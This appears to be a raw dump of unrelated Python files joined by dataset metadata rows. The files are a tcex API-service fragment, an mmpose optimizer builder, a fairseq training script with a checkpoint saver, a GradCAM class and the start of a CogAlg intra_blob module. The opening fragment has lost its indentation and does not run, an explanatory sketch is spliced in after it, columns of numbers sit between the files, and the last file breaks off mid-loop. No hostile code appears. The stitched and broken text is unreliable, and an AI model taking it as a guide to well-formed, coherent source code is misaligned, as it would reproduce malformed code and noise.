except Exception as e:
self.log.error(f'feature=api-service, event=failed-building-environ, error="""{e}"""')
self.log.trace(traceback.format_exc())
self.increment_metric('Errors')
return # stop processing
def response_handler(*args, **kwargs): # pylint: disable=unused-argument
"""Handle WSGI Response"""
kwargs['event'] = event # add event to kwargs for blocking
kwargs['request_key'] = request_key
self.service_thread(
name='response-handler',
target=self.process_run_service_response,
args=args,
kwargs=kwargs,
)
if callable(self.api_event_callback):
try:
body_data: Any = self.api_event_callback( # pylint: disable=not-callable
environ, response_handler
)
# process body
body = ''
if hasattr(body_data, 'read'):
body = body_data.read()
elif isinstance(body_data, list):
for bd in body_data:
if hasattr(bd, 'read'):
body += bd.read()
elif isinstance(bd, bytes):
body += bd.decode()
elif isinstance(bd, list):
for b in bd:
self.log.error(f'unhandled type - {type(b)}')
else:
self.log.error(f'unhandled type - {type(body)}')
self.log.error(f'unhandled type dir - {dir(body)}')
# write body to Redis
self.key_value_store.create(request_key, 'response.body', body)
# set thread event to True to trigger response
self.log.info('feature=api-service, event=response-body-written')
event.set()
except Exception as e:
self.log.error(
f'feature=api-service, event=api-event-callback-failed, error="""{e}""".'
)
self.log.trace(traceback.format_exc())
self.increment_metric('Errors')
# unregister config apiToken
self.token.unregister_token(self.thread_name)
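A standalone sketch (not part of the tcex API itself) of the name/value conventions used above: query parameters arrive as a list of {'name': ..., 'value': ...} dicts and are folded into a query string, while header names are upper-cased into WSGI-style HTTP_* keys, mirroring process_run_service_command:

params = [{'name': 'owner', 'value': 'demo'}, {'name': 'limit', 'value': 5}]
query_string = '&'.join(f"{p.get('name')}={p.get('value')}" for p in params)
assert query_string == 'owner=demo&limit=5'

headers = {'content-type': 'application/json', 'x-request-id': 'abc'}
environ = {}
if headers.get('content-type') is not None:
    environ['CONTENT_TYPE'] = headers.pop('content-type')
for header, value in headers.items():
    environ[f'HTTP_{header}'.upper()] = value
# dashes are kept as-is, exactly as the code above does
assert environ == {'CONTENT_TYPE': 'application/json', 'HTTP_X-REQUEST-ID': 'abc'}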
| 38.271429
| 100
| 0.535741
| 1,131
| 10,716
| 4.971706
| 0.220159
| 0.028632
| 0.019918
| 0.04695
| 0.295038
| 0.27014
| 0.254846
| 0.223546
| 0.201672
| 0.176774
| 0
| 0.004131
| 0.344905
| 10,716
| 279
| 101
| 38.408602
| 0.796866
| 0.205767
| 0
| 0.216374
| 0
| 0.005848
| 0.196624
| 0.041271
| 0
| 0
| 0
| 0.003584
| 0
| 1
| 0.046784
| false
| 0
| 0.040936
| 0
| 0.122807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5ee43eaf3c3033dcd289654572ab9b3e0e7b99a
| 1,540
|
py
|
Python
|
mmpose/core/optimizer/builder.py
|
vsatyakumar/mmpose
|
2fffccb19dad3b59184b41be94653f75523b8585
|
[
"Apache-2.0"
] | 1
|
2021-05-06T08:40:13.000Z
|
2021-05-06T08:40:13.000Z
|
mmpose/core/optimizer/builder.py
|
CV-IP/mmpose
|
3ef8e6dbbeb6262b7ed6c51faa74b83c23f4c6a1
|
[
"Apache-2.0"
] | null | null | null |
mmpose/core/optimizer/builder.py
|
CV-IP/mmpose
|
3ef8e6dbbeb6262b7ed6c51faa74b83c23f4c6a1
|
[
"Apache-2.0"
] | null | null | null |
from mmcv.runner import build_optimizer
def build_optimizers(model, cfgs):
"""Build multiple optimizers from configs.
If `cfgs` contains several dicts for optimizers, then a dict for each
constructed optimizers will be returned.
If `cfgs` only contains one optimizer config, the constructed optimizer
itself will be returned.
For example,
1) Multiple optimizer configs:
.. code-block:: python
optimizer_cfg = dict(
model1=dict(type='SGD', lr=lr),
model2=dict(type='SGD', lr=lr))
The return dict is
``dict('model1': torch.optim.Optimizer, 'model2': torch.optim.Optimizer)``
2) Single optimizer config:
.. code-block:: python
optimizer_cfg = dict(type='SGD', lr=lr)
The return is ``torch.optim.Optimizer``.
Args:
model (:obj:`nn.Module`): The model with parameters to be optimized.
cfgs (dict): The config dict of the optimizer.
Returns:
dict[:obj:`torch.optim.Optimizer`] | :obj:`torch.optim.Optimizer`:
The initialized optimizers.
"""
optimizers = {}
if hasattr(model, 'module'):
model = model.module
# determine whether 'cfgs' has several dicts for optimizers
if all(isinstance(v, dict) for v in cfgs.values()):
for key, cfg in cfgs.items():
cfg_ = cfg.copy()
module = getattr(model, key)
optimizers[key] = build_optimizer(module, cfg_)
return optimizers
else:
return build_optimizer(model, cfgs)
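A minimal usage sketch following the docstring above; the two-submodule model and learning rates are illustrative, and mmcv plus torch are assumed installed:

import torch.nn as nn

class TwoPartModel(nn.Module):
    def __init__(self):
        super().__init__()
        self.model1 = nn.Linear(8, 4)
        self.model2 = nn.Linear(4, 2)

model = TwoPartModel()
# several per-submodule configs -> a dict of optimizers
optimizers = build_optimizers(model, dict(
    model1=dict(type='SGD', lr=0.01),
    model2=dict(type='SGD', lr=0.001),
))
# single config -> the optimizer itself
optimizer = build_optimizers(model, dict(type='SGD', lr=0.01))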
| 29.056604
| 78
| 0.635065
| 190
| 1,540
| 5.105263
| 0.378947
| 0.051546
| 0.097938
| 0.040206
| 0.124742
| 0.109278
| 0.049485
| 0
| 0
| 0
| 0
| 0.005249
| 0.257792
| 1,540
| 52
| 79
| 29.615385
| 0.843395
| 0.627922
| 0
| 0
| 0
| 0
| 0.012658
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.076923
| 0
| 0.307692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5efef002e68abbec6057f8677301ab26bdc9a66
| 16,846
|
py
|
Python
|
custom_train.py
|
shirley-wu/text_to_table
|
44cb100b8ff2543b5b4efe1461502c00c34ef846
|
[
"MIT"
] | 3
|
2022-03-17T05:55:23.000Z
|
2022-03-30T08:34:14.000Z
|
custom_train.py
|
shirley-wu/text_to_table
|
44cb100b8ff2543b5b4efe1461502c00c34ef846
|
[
"MIT"
] | 1
|
2022-03-30T09:04:54.000Z
|
2022-03-30T09:04:54.000Z
|
custom_train.py
|
shirley-wu/text_to_table
|
44cb100b8ff2543b5b4efe1461502c00c34ef846
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3 -u
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Train a new model on one or across multiple GPUs.
"""
import collections
import logging
import math
import os
import sys
import numpy as np
import torch
from fairseq import (
checkpoint_utils,
distributed_utils,
options,
quantization_utils,
tasks,
utils,
)
from fairseq import meters
from fairseq.checkpoint_utils import checkpoint_paths
from fairseq.data import iterators
from fairseq.file_io import PathManager
from fairseq.logging import metrics, progress_bar
from fairseq.model_parallel.megatron_trainer import MegatronTrainer
from fairseq.trainer import Trainer
logging.basicConfig(
format="%(asctime)s | %(levelname)s | %(name)s | %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=os.environ.get("LOGLEVEL", "INFO").upper(),
stream=sys.stdout,
)
logger = logging.getLogger("fairseq_cli.train")
class Saver:
def __init__(self):
self.best = None
self.keep_best = []
def save_checkpoint(self, args, trainer, epoch_itr, val_loss):
# only one worker should attempt to create the required dir
if args.distributed_rank == 0:
os.makedirs(args.save_dir, exist_ok=True)
prev_best = val_loss if self.best is None else self.best
if val_loss is not None:
best_function = max if args.maximize_best_checkpoint_metric else min
self.best = best_function(val_loss, prev_best)
if args.no_save:
return
trainer.consolidate_optimizer()
if not trainer.is_data_parallel_master:
return
def is_better(a, b):
return a >= b if args.maximize_best_checkpoint_metric else a <= b
write_timer = meters.StopwatchMeter()
write_timer.start()
epoch = epoch_itr.epoch
end_of_epoch = epoch_itr.end_of_epoch()
updates = trainer.get_num_updates()
suffix = getattr(args, "checkpoint_suffix", "")
checkpoint_conds = collections.OrderedDict()
save_epoch_checkpoint = (
end_of_epoch
and not args.no_epoch_checkpoints
and epoch % args.save_interval == 0
)
checkpoint_conds["checkpoint{}{}.pt".format(epoch, suffix)] = save_epoch_checkpoint
checkpoint_conds["checkpoint_{}_{}{}.pt".format(epoch, updates, suffix)] = (
not save_epoch_checkpoint
and args.save_interval_updates > 0
and updates % args.save_interval_updates == 0
)
checkpoint_conds["checkpoint_best{}.pt".format(suffix)] = val_loss is not None and (
self.best is None
or is_better(val_loss, self.best)
)
checkpoint_conds[
"checkpoint_last{}.pt".format(suffix)
] = not args.no_last_checkpoints
extra_state = {"train_iterator": epoch_itr.state_dict(), "val_loss": val_loss}
if self.best is not None:
extra_state.update({"best": self.best})
if args.keep_best_checkpoints > 0 and (len(self.keep_best) < args.keep_best_checkpoints or (
val_loss is not None and not is_better(self.keep_best[-1][0], val_loss))):
ckpt_name = "checkpoint{}{}.best_{:.4f}.pt".format(epoch, suffix, val_loss) if save_epoch_checkpoint \
else "checkpoint_{}_{}{}.best_{:.4f}.pt".format(epoch, updates, suffix, val_loss)
checkpoint_conds[ckpt_name] = True
self.keep_best.append((val_loss, ckpt_name))
self.keep_best = sorted(self.keep_best)
checkpoints = [
os.path.join(args.save_dir, fn) for fn, cond in checkpoint_conds.items() if cond
]
if len(checkpoints) > 0:
trainer.save_checkpoint(checkpoints[0], extra_state)
for cp in checkpoints[1:]:
PathManager.copy(checkpoints[0], cp, overwrite=True)
write_timer.stop()
logger.info(
"saved checkpoint {} (epoch {} @ {} updates, score {}) (writing took {} seconds)".format(
checkpoints[0], epoch, updates, val_loss, write_timer.sum
)
)
if not end_of_epoch and args.keep_interval_updates > 0:
# remove old checkpoints; checkpoints are sorted in descending order
checkpoints = checkpoint_paths(
args.save_dir, pattern=r"checkpoint_\d+_(\d+)\.pt"
)
for old_chk in checkpoints[args.keep_interval_updates:]:
if os.path.lexists(old_chk):
os.remove(old_chk)
if args.keep_last_epochs > 0:
# remove old epoch checkpoints; checkpoints are sorted in descending order
checkpoints = checkpoint_paths(args.save_dir, pattern=r"checkpoint(\d+)\.pt")
for old_chk in checkpoints[args.keep_last_epochs:]:
if os.path.lexists(old_chk):
os.remove(old_chk)
if len(self.keep_best) > args.keep_best_checkpoints:
for _, x in self.keep_best[args.keep_best_checkpoints:]:
x = os.path.join(args.save_dir, x)
if os.path.lexists(x):
os.remove(x)
self.keep_best = self.keep_best[:args.keep_best_checkpoints]
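# Illustration (hypothetical values) of the checkpoint_conds logic above: with
# epoch=3, updates=12000, suffix="" and save_interval_updates=4000, a mid-epoch
# save writes "checkpoint_3_12000.pt"; "checkpoint_best.pt" is (re)written
# whenever val_loss improves, and "checkpoint_last.pt" on every save unless
# --no-last-checkpoints is given. Only the first file is written; the others
# are copies of it.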
def main(args):
saver = Saver()
utils.import_user_module(args)
assert (
args.max_tokens is not None or args.batch_size is not None
), "Must specify batch size either with --max-tokens or --batch-size"
metrics.reset()
np.random.seed(args.seed)
utils.set_torch_seed(args.seed)
if distributed_utils.is_master(args):
checkpoint_utils.verify_checkpoint_directory(args.save_dir)
# Print args
logger.info(args)
# Setup task, e.g., translation, language modeling, etc.
task = tasks.setup_task(args)
# Load valid dataset (we load training data below, based on the latest checkpoint)
for valid_sub_split in args.valid_subset.split(","):
task.load_dataset(valid_sub_split, combine=False, epoch=1)
# Build model and criterion
model = task.build_model(args)
criterion = task.build_criterion(args)
logger.info(model)
logger.info("task: {} ({})".format(args.task, task.__class__.__name__))
logger.info("model: {} ({})".format(args.arch, model.__class__.__name__))
logger.info(
"criterion: {} ({})".format(args.criterion, criterion.__class__.__name__)
)
logger.info(
"num. model params: {} (num. trained: {})".format(
sum(p.numel() for p in model.parameters()),
sum(p.numel() for p in model.parameters() if p.requires_grad),
)
)
# (optionally) Configure quantization
if args.quantization_config_path is not None:
quantizer = quantization_utils.Quantizer(
config_path=args.quantization_config_path,
max_epoch=args.max_epoch,
max_update=args.max_update,
)
else:
quantizer = None
# Build trainer
if args.model_parallel_size == 1:
trainer = Trainer(args, task, model, criterion, quantizer)
else:
trainer = MegatronTrainer(args, task, model, criterion)
logger.info(
"training on {} devices (GPUs/TPUs)".format(args.distributed_world_size)
)
logger.info(
"max tokens per GPU = {} and max sentences per GPU = {}".format(
args.max_tokens, args.batch_size
)
)
# Load the latest checkpoint if one is available and restore the
# corresponding train iterator
extra_state, epoch_itr = checkpoint_utils.load_checkpoint(
args,
trainer,
# don't cache epoch iterators for sharded datasets
disable_iterator_cache=task.has_sharded_data("train"),
)
# Train until the learning rate gets too small
max_epoch = args.max_epoch or math.inf
lr = trainer.get_lr()
train_meter = meters.StopwatchMeter()
train_meter.start()
while lr > args.min_lr and epoch_itr.next_epoch_idx <= max_epoch:
# train for one epoch
valid_losses, should_stop = train(args, trainer, task, epoch_itr, saver)
if should_stop:
break
# only use first validation loss to update the learning rate
lr = trainer.lr_step(epoch_itr.epoch, valid_losses[0])
epoch_itr = trainer.get_train_iterator(
epoch_itr.next_epoch_idx,
# sharded data: get train iterator for next epoch
load_dataset=task.has_sharded_data("train"),
# don't cache epoch iterators for sharded datasets
disable_iterator_cache=task.has_sharded_data("train"),
)
train_meter.stop()
logger.info("done training in {:.1f} seconds".format(train_meter.sum))
def should_stop_early(args, valid_loss):
# skip check if no validation was done in the current epoch
if valid_loss is None:
return False
if args.patience <= 0:
return False
def is_better(a, b):
return a > b if args.maximize_best_checkpoint_metric else a < b
prev_best = getattr(should_stop_early, "best", None)
if prev_best is None or is_better(valid_loss, prev_best):
should_stop_early.best = valid_loss
should_stop_early.num_runs = 0
return False
else:
should_stop_early.num_runs += 1
if should_stop_early.num_runs >= args.patience:
logger.info(
"early stop since valid performance hasn't improved for last {} runs".format(
args.patience
)
)
return True
else:
return False
@metrics.aggregate("train")
def train(args, trainer, task, epoch_itr, saver):
"""Train the model for one epoch and return validation losses."""
# Initialize data iterator
itr = epoch_itr.next_epoch_itr(
fix_batches_to_gpus=args.fix_batches_to_gpus,
shuffle=(epoch_itr.next_epoch_idx > args.curriculum),
)
update_freq = (
args.update_freq[epoch_itr.epoch - 1]
if epoch_itr.epoch <= len(args.update_freq)
else args.update_freq[-1]
)
itr = iterators.GroupedIterator(itr, update_freq)
if getattr(args, "tpu", False):
itr = utils.tpu_data_loader(itr)
progress = progress_bar.progress_bar(
itr,
log_format=args.log_format,
log_interval=args.log_interval,
epoch=epoch_itr.epoch,
tensorboard_logdir=(
args.tensorboard_logdir if distributed_utils.is_master(args) else None
),
default_log_format=("tqdm" if not args.no_progress_bar else "simple"),
)
trainer.begin_epoch(epoch_itr.epoch)
valid_losses = [None]
valid_subsets = args.valid_subset.split(",")
should_stop = False
num_updates = trainer.get_num_updates()
for i, samples in enumerate(progress):
with metrics.aggregate("train_inner"), torch.autograd.profiler.record_function(
"train_step-%d" % i
):
log_output = trainer.train_step(samples)
if log_output is not None: # not OOM, overflow, ...
# log mid-epoch stats
num_updates = trainer.get_num_updates()
if num_updates % args.log_interval == 0:
stats = get_training_stats(metrics.get_smoothed_values("train_inner"))
progress.log(stats, tag="train_inner", step=num_updates)
# reset mid-epoch stats after each log interval
# the end-of-epoch stats will still be preserved
metrics.reset_meters("train_inner")
end_of_epoch = not itr.has_next()
valid_losses, should_stop = validate_and_save(
args, trainer, task, epoch_itr, valid_subsets, end_of_epoch, saver
)
if should_stop:
break
# log end-of-epoch stats
logger.info("end of epoch {} (average epoch stats below)".format(epoch_itr.epoch))
stats = get_training_stats(metrics.get_smoothed_values("train"))
progress.print(stats, tag="train", step=num_updates)
# reset epoch-level meters
metrics.reset_meters("train")
return valid_losses, should_stop
def validate_and_save(args, trainer, task, epoch_itr, valid_subsets, end_of_epoch, saver):
num_updates = trainer.get_num_updates()
max_update = args.max_update or math.inf
do_save = (
(end_of_epoch and epoch_itr.epoch % args.save_interval == 0)
or num_updates >= max_update
or (
args.save_interval_updates > 0
and num_updates > 0
and num_updates % args.save_interval_updates == 0
and num_updates >= args.validate_after_updates
)
)
do_validate = (
(not end_of_epoch and do_save) # validate during mid-epoch saves
or (end_of_epoch and epoch_itr.epoch % args.validate_interval == 0)
or num_updates >= max_update
or (
args.validate_interval_updates > 0
and num_updates > 0
and num_updates % args.validate_interval_updates == 0
)
) and not args.disable_validation
# Validate
valid_losses = [None]
if do_validate:
valid_losses = validate(args, trainer, task, epoch_itr, valid_subsets, saver)
# Stopping conditions
should_stop = (
should_stop_early(args, valid_losses[0])
or num_updates >= max_update
or (
args.stop_time_hours > 0
and trainer.cumulative_training_time() / (60 * 60) > args.stop_time_hours
)
)
# Save checkpoint
if do_save or should_stop:
logger.info("begin save checkpoint")
saver.save_checkpoint(args, trainer, epoch_itr, valid_losses[0])
return valid_losses, should_stop
def get_training_stats(stats):
stats["wall"] = round(metrics.get_meter("default", "wall").elapsed_time, 0)
return stats
def validate(args, trainer, task, epoch_itr, subsets, saver):
"""Evaluate the model on the validation set(s) and return the losses."""
if args.fixed_validation_seed is not None:
# set fixed seed for every validation
utils.set_torch_seed(args.fixed_validation_seed)
trainer.begin_valid_epoch(epoch_itr.epoch)
valid_losses = []
for subset in subsets:
logger.info('begin validation on "{}" subset'.format(subset))
# Initialize data iterator
itr = trainer.get_valid_iterator(subset).next_epoch_itr(shuffle=False)
if getattr(args, "tpu", False):
itr = utils.tpu_data_loader(itr)
progress = progress_bar.progress_bar(
itr,
log_format=args.log_format,
log_interval=args.log_interval,
epoch=epoch_itr.epoch,
prefix=f"valid on '{subset}' subset",
tensorboard_logdir=(
args.tensorboard_logdir if distributed_utils.is_master(args) else None
),
default_log_format=("tqdm" if not args.no_progress_bar else "simple"),
)
# create a new root metrics aggregator so validation metrics
# don't pollute other aggregators (e.g., train meters)
with metrics.aggregate(new_root=True) as agg:
for sample in progress:
trainer.valid_step(sample)
# log validation stats
stats = get_valid_stats(args, trainer, agg.get_smoothed_values(), saver)
progress.print(stats, tag=subset, step=trainer.get_num_updates())
valid_losses.append(stats[args.best_checkpoint_metric])
return valid_losses
def get_valid_stats(args, trainer, stats, saver):
stats["num_updates"] = trainer.get_num_updates()
if hasattr(saver.save_checkpoint, "best"):
key = "best_{0}".format(args.best_checkpoint_metric)
best_function = max if args.maximize_best_checkpoint_metric else min
stats[key] = best_function(
saver.save_checkpoint.best, stats[args.best_checkpoint_metric]
)
return stats
def cli_main(modify_parser=None):
parser = options.get_training_parser()
args = options.parse_args_and_arch(parser, modify_parser=modify_parser)
if args.profile:
with torch.cuda.profiler.profile():
with torch.autograd.profiler.emit_nvtx():
distributed_utils.call_main(args, main)
else:
distributed_utils.call_main(args, main)
if __name__ == "__main__":
cli_main()
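A small illustration of the patience logic in should_stop_early, using a stub args namespace (field names taken from the code above; the function keeps its state in function attributes, so this assumes a fresh process and the same module):

from types import SimpleNamespace

args = SimpleNamespace(patience=2, maximize_best_checkpoint_metric=False)
losses = [1.0, 0.9, 0.95, 0.96, 0.97]  # validation loss stops improving after 0.9
for step, loss in enumerate(losses):
    if should_stop_early(args, loss):
        print(f"early stop at step {step}")  # early stop at step 3
        break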
| 36.306034
| 114
| 0.633919
| 2,120
| 16,846
| 4.789623
| 0.171226
| 0.022848
| 0.012803
| 0.011818
| 0.348533
| 0.293776
| 0.219125
| 0.200315
| 0.167323
| 0.143983
| 0
| 0.003597
| 0.273893
| 16,846
| 463
| 115
| 36.384449
| 0.826521
| 0.10038
| 0
| 0.208092
| 0
| 0
| 0.06815
| 0.007087
| 0
| 0
| 0
| 0
| 0.00289
| 1
| 0.034682
| false
| 0
| 0.046243
| 0.00578
| 0.124277
| 0.00578
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5f13f54fb0bf75e7d45a4d1bb426a38fb3fb255
| 3,403
|
py
|
Python
|
visualization.py
|
shyhyawJou/GradCAM-pytorch
|
8159f077552fc71055fe97c17bf8544d32cc8b0f
|
[
"Apache-2.0"
] | null | null | null |
visualization.py
|
shyhyawJou/GradCAM-pytorch
|
8159f077552fc71055fe97c17bf8544d32cc8b0f
|
[
"Apache-2.0"
] | null | null | null |
visualization.py
|
shyhyawJou/GradCAM-pytorch
|
8159f077552fc71055fe97c17bf8544d32cc8b0f
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
from torch.nn import functional as F
from PIL import Image
import cv2 as cv
from matplotlib import cm
import numpy as np
class GradCAM:
"""
#### Args:
layer_name: module name (not child name), if None,
will use the last layer before average pooling
, default is None
"""
def __init__(self, model, device, layer_name=None, close_some_grad=True):
if layer_name is None:
layer_name = self.get_layer_name(model)
if layer_name is None:
raise ValueError(
"There is no global average pooling layer, plz specify 'layer_name'"
)
for n, m in model.named_children():
if close_some_grad:
m.requires_grad_(False)
for sub_n, sub_m in m.named_modules():
if '.'.join((n, sub_n)) == layer_name:
sub_m.register_forward_hook(self.forward_hook)
sub_m.register_full_backward_hook(self.backward_hook)
m.requires_grad_(True)
break
model = model.to(device)
self.model = model
self.device = device
self.feature_maps = {}
self.gradients = {}
def get_heatmap(self, img, img_tensor):
self.model.zero_grad()
img_tensor = img_tensor.to(self.device)
outputs = self.model(img_tensor)
_, pred_label = outputs.max(1)
# outputs shape = 1x2
outputs[0][pred_label].backward()
with torch.no_grad():
feature_maps = self.feature_maps["output"]
# "gradients" is a tuple with one item
grad_weights = self.gradients["output"][0]
h, w = grad_weights.size()[-2:]
grad_weights = grad_weights.sum((2,3), True) / (h * w)
cam = (grad_weights * feature_maps).sum(1)
F.relu(cam, True)
cam = cam / cam.max() * 255
cam = cam.to(dtype=torch.uint8, device="cpu")
cam = cam.numpy().transpose(1,2,0)
cam = cv.resize(cam, img.size[:2], interpolation=4)
cam = np.uint8(255 * cm.get_cmap("jet")(cam.squeeze()))
if not isinstance(img, np.ndarray):
img = np.asarray(img)
img_size = img.shape[:2][::-1] # w, h
overlay = np.uint8(0.6*img + 0.4 * cam[:,:,:3])
overlay = Image.fromarray(overlay)
if overlay.size != img_size:
overlay = overlay.resize(img_size, Image.BILINEAR)
return outputs.detach(), overlay
def get_layer_name(self, model):
layer_name = None
tmp = None  # name of the module visited just before a pooling layer; avoids UnboundLocalError if pooling comes first
for n, m in model.named_children():
for sub_n, sub_m in m.named_modules():
if isinstance(sub_m, (nn.AdaptiveAvgPool2d, nn.AvgPool2d)):
layer_name = tmp
tmp = '.'.join((n, sub_n))
return layer_name
def forward_hook(self, module, x, y):
#self.feature_maps["input"] = x
self.feature_maps["output"] = y
def backward_hook(self, module, x, y):
#self.gradients["input"] = x
self.gradients["output"] = y
self.gradients["output"] = y
| 34.72449
| 85
| 0.528945
| 416
| 3,403
| 4.151442
| 0.300481
| 0.062536
| 0.034742
| 0.015055
| 0.104227
| 0.08454
| 0.061378
| 0.032426
| 0.032426
| 0.032426
| 0
| 0.015242
| 0.363797
| 3,403
| 97
| 86
| 35.082474
| 0.782448
| 0.083162
| 0
| 0.117647
| 0
| 0
| 0.034771
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073529
| false
| 0
| 0.102941
| 0
| 0.220588
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5f302c5d8d693812839ea69e155909e598db642
| 19,149
|
py
|
Python
|
frame_2D_alg/alternative versions/intra_blob_xy.py
|
Mechachleopteryx/CogAlg
|
723104e1f57010e52f1dc249ba53ba58db0a991b
|
[
"MIT"
] | null | null | null |
frame_2D_alg/alternative versions/intra_blob_xy.py
|
Mechachleopteryx/CogAlg
|
723104e1f57010e52f1dc249ba53ba58db0a991b
|
[
"MIT"
] | null | null | null |
frame_2D_alg/alternative versions/intra_blob_xy.py
|
Mechachleopteryx/CogAlg
|
723104e1f57010e52f1dc249ba53ba58db0a991b
|
[
"MIT"
] | null | null | null |
'''
2D version of 1st-level algorithm is a combination of frame_blobs, intra_blob, and comp_P: optional raster-to-vector conversion.
intra_blob recursively evaluates each blob for two forks of extended internal cross-comparison and sub-clustering:
der+: incremental derivation cross-comp in high-variation edge areas of +vg: positive deviation of gradient triggers comp_g,
rng+: incremental range cross-comp in low-variation flat areas of +v--vg: positive deviation of negated -vg triggers comp_r.
Each adds a layer of sub_blobs per blob.
Please see diagram: https://github.com/boris-kz/CogAlg/blob/master/frame_2D_alg/Illustrations/intra_blob_2_fork_scheme.png
Blob structure, for all layers of blob hierarchy:
root_dert__,
Dert = I, iDy, iDx, G, Dy, Dx, M, S (area), Ly (vertical dimension)
# I: input, (iDy, iDx): angle of input gradient, G: gradient, (Dy, Dx): vertical and lateral Ds, M: match
sign,
box, # y0, yn, x0, xn
dert__, # box of derts, each = i, idy, idx, g, dy, dx, m
stack_[ stack_params, Py_ [(P_params, dert_)]]: refs down blob formation tree, in vertical (horizontal) order
# next fork:
fcr, # flag comp rng, also clustering criterion in dert and Dert: g in der+ fork, i+m in rng+ fork?
fig, # flag input is gradient
rdn, # redundancy to higher layers
rng, # comp range
sub_layers # [sub_blobs ]: list of layers across sub_blob derivation tree
# deeper layers are nested, multiple forks: no single set of fork params?
'''
from collections import deque, defaultdict
from class_cluster import ClusterStructure, NoneType
from class_bind import AdjBinder
from frame_blobs_yx import assign_adjacents
from intra_comp_g import comp_g, comp_r
from itertools import zip_longest
from class_stream import BlobStreamer
from utils import pairwise
import numpy as np
# from comp_P_draft import comp_P_blob
# filters, All *= rdn:
ave = 50 # fixed cost per dert, from average m, reflects blob definition cost, may be different for comp_a?
aveB = 50 # fixed cost per intra_blob comp and clustering
class CDeepP(ClusterStructure):
I = int
G = int
Dy = int
Dx = int
M = int
iDy = int
iDx = int
L = int
x0 = int
sign = NoneType
class CDeepStack(ClusterStructure):
I = int
G = int
Dy = int
Dx = int
M = int
iDy = int
iDx = int
S = int
Ly = int
y0 = int
Py_ = list
blob = object
down_connect_cnt = int
sign = NoneType
class CDeepBlob(ClusterStructure):
Dert = dict
box = list
stack_ = list
sign = NoneType
open_stacks = int
root_dert__ = object
dert__ = object
mask = object
adj_blobs = list
fopen = bool
margin = list
fcr = bool
fig = bool
rdn = float
rng = int
Ls = int # for visibility and next-fork rdn
sub_layers = list
# --------------------------------------------------------------------------------------------------------------
# functions, ALL WORK-IN-PROGRESS:
def intra_blob(blob, rdn, rng, fig, fcr, **kwargs): # recursive input rng+ | der+ cross-comp within blob
# fig: flag input is g | p, fcr: flag comp over rng+ | der+
if kwargs.get('render', None) is not None: # stop rendering sub-blobs when blob is too small
if blob.Dert['S'] < 100:
kwargs['render'] = False
spliced_layers = [] # to extend root_blob sub_layers
ext_dert__, ext_mask = extend_dert(blob)
if fcr:
dert__, mask = comp_r(ext_dert__, fig, fcr, ext_mask) # -> m sub_blobs
else:
dert__, mask = comp_g(ext_dert__, ext_mask) # -> g sub_blobs:
if dert__[0].shape[0] > 2 and dert__[0].shape[1] > 2 and False in mask: # min size in y and x, at least one dert in dert__
sub_blobs = cluster_derts(dert__, mask, ave * rdn, fcr, fig, **kwargs)
# fork params:
blob.fcr = fcr
blob.fig = fig
blob.rdn = rdn
blob.rng = rng
blob.Ls = len(sub_blobs) # for visibility and next-fork rdn
blob.sub_layers = [sub_blobs] # 1st layer of sub_blobs
for sub_blob in sub_blobs: # evaluate for intra_blob comp_g | comp_r:
G = blob.Dert['G']; adj_G = blob.adj_blobs[2]
borrow = min(abs(G), abs(adj_G) / 2) # or adjacent M if negative sign?
if sub_blob.sign:
if sub_blob.Dert['M'] - borrow > aveB * rdn: # M - (intra_comp value lend to edge blob)
# comp_r fork:
blob.sub_layers += intra_blob(sub_blob, rdn + 1 + 1 / blob.Ls, rng * 2, fig=fig, fcr=1, **kwargs)
# else: comp_P_
elif sub_blob.Dert['G'] + borrow > aveB * rdn: # G + (intra_comp value borrow from flat blob)
# comp_g fork:
blob.sub_layers += intra_blob(sub_blob, rdn + 1 + 1 / blob.Ls, rng=rng, fig=1, fcr=0, **kwargs)
# else: comp_P_
spliced_layers = [spliced_layers + sub_layers for spliced_layers, sub_layers in
zip_longest(spliced_layers, blob.sub_layers, fillvalue=[])]
return spliced_layers
def cluster_derts(dert__, mask, Ave, fcr, fig, render=False): # similar to frame_to_blobs
if fcr: # comp_r output; form clustering criterion:
if fig:
crit__ = dert__[0] + dert__[6] - Ave # eval by i + m, accum in rng; dert__[:,:,0] if not transposed
else:
crit__ = Ave - dert__[3] # eval by -g, accum in rng
else: # comp_g output
crit__ = dert__[6] - Ave # comp_g output eval by m, or clustering is always by m?
root_dert__ = dert__ # derts after the comps operation, which is the root_dert__
dert__ = [*zip(*dert__)] # transpose dert__ into shape [y, params, x]
sub_blobs = [] # from form_blob:
stack_ = deque() # buffer of running vertical stacks of Ps
stack_binder = AdjBinder(CDeepStack)
if render:
streamer = BlobStreamer(CDeepBlob, crit__, mask)
for y, dert_ in enumerate(dert__): # in height, first and last row are discarded; print(f'Processing intra line {y}...')
# if False in mask[i]: # [y,x,params], there is at least one dert in line
